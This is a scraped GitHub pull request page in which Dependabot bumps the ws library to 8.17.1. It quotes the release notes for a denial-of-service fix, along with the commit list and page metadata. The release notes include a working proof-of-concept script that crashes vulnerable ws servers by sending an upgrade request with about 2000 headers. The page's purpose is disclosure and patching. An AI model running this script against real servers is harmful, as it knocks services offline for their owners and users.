Title: Bump ws from 8.13.0 to 8.17.1 in /NodeJS/1-npm by dependabot[bot] · Pull Request #3 · HowProgrammingWorks/Modularity · GitHub
Open Graph Title: Bump ws from 8.13.0 to 8.17.1 in /NodeJS/1-npm by dependabot[bot] · Pull Request #3 · HowProgrammingWorks/Modularity
X Title: Bump ws from 8.13.0 to 8.17.1 in /NodeJS/1-npm by dependabot[bot] · Pull Request #3 · HowProgrammingWorks/Modularity
Description: Bumps ws from 8.13.0 to 8.17.1.
Release notes
Sourced from ws's releases.
8.17.1
Bug fixes
Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[server.maxHeadersCount][]
threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
Reduce the maximum allowed length of the request headers using the
[--max-http-header-size=size][] and/or the [maxHeaderSize][] options so
that no more headers than the server.maxHeadersCount limit can be sent.
... (truncated)
Commits
3c56601 [dist] 8.17.1
e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
6a00029 [test] Increase code coverage
ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
b73b118 [dist] 8.17.0
29694a5 [test] Use the highWaterMark variable
934c9d6 [ci] Test on node 22
1817bac [ci] Do not test on node 21
96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
Additional commits viewable in compare view
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot show
Open Graph Description: Bumps ws from 8.13.0 to 8.17.1. Release notes Sourced from ws's releases. 8.17.1 Bug fixes Fixed a DoS vulnerability (#2231). A request with a number of headers exceeding the[server.maxHead...
X Description: Bumps ws from 8.13.0 to 8.17.1. Release notes Sourced from ws's releases. 8.17.1 Bug fixes Fixed a DoS vulnerability (#2231). A request with a number of headers exceeding the[server.max...
Opengraph URL: https://github.com/HowProgrammingWorks/Modularity/pull/3
X: @github
Domain: patch-diff.githubusercontent.com
| route-pattern | /:user_id/:repository/pull/:id/checks(.:format) |
| route-controller | pull_requests |
| route-action | checks |
| fetch-nonce | v2:a227bd5f-d0dd-a219-b9d0-92f673575c12 |
| current-catalog-service-hash | 87dc3bc62d9b466312751bfd5f889726f4f1337bdff4e8be7da7c93d6c00a25a |
| request-id | C82C:17707D:4B1C10:5E826C:699201B9 |
| html-safe-nonce | 6b65472f3c27c85540ac8e7dfd0a20bcdcefb13084b780375008e8644c08300c |
| visitor-payload | eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDODJDOjE3NzA3RDo0QjFDMTA6NUU4MjZDOjY5OTIwMUI5IiwidmlzaXRvcl9pZCI6Ijc2ODY2MDkwMDYxMjc4NzQ0ODkiLCJyZWdpb25fZWRnZSI6ImlhZCIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ== |
| visitor-hmac | ae71ece1287cf9626fbb79a6958bec0cbf54f428ce7fce2a912bb47b5817e2a7 |
| hovercard-subject-tag | pull_request:1926127041 |
| github-keyboard-shortcuts | repository,pull-request-list,pull-request-conversation,pull-request-files-changed,checks,copilot |
| google-site-verification | Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I |
| octolytics-url | https://collector.github.com/github/collect |
| analytics-location | / |
| fb:app_id | 1401488693436528 |
| apple-itunes-app | app-id=1477376905, app-argument=https://github.com/HowProgrammingWorks/Modularity/pull/3/checks |
| twitter:image | https://avatars.githubusercontent.com/in/29110?s=400&v=4 |
| twitter:card | summary_large_image |
| og:image | https://avatars.githubusercontent.com/in/29110?s=400&v=4 |
| og:image:alt | Bumps ws from 8.13.0 to 8.17.1. Release notes Sourced from ws's releases. 8.17.1 Bug fixes Fixed a DoS vulnerability (#2231). A request with a number of headers exceeding the[server.maxHead... |
| og:site_name | GitHub |
| og:type | object |
| hostname | github.com |
| expected-hostname | github.com |
| None | 42c603b9d642c4a9065a51770f75e5e27132fef0e858607f5c9cb7e422831a7b |
| turbo-cache-control | no-preview |
| go-import | github.com/HowProgrammingWorks/Modularity git https://github.com/HowProgrammingWorks/Modularity.git |
| octolytics-dimension-user_id | 17366055 |
| octolytics-dimension-user_login | HowProgrammingWorks |
| octolytics-dimension-repository_id | 85836525 |
| octolytics-dimension-repository_nwo | HowProgrammingWorks/Modularity |
| octolytics-dimension-repository_public | true |
| octolytics-dimension-repository_is_fork | false |
| octolytics-dimension-repository_network_root_id | 85836525 |
| octolytics-dimension-repository_network_root_nwo | HowProgrammingWorks/Modularity |
| turbo-body-classes | logged-out env-production page-responsive full-width full-width-p-0 |
| disable-turbo | false |
| browser-stats-url | https://api.github.com/_private/browser/stats |
| browser-errors-url | https://api.github.com/_private/browser/errors |
| release | 848bc6032dcc93a9a7301dcc3f379a72ba13b96e |
| ui-target | full |
| theme-color | #1e2327 |
| color-scheme | light dark |
Links:
Viewport: width=device-width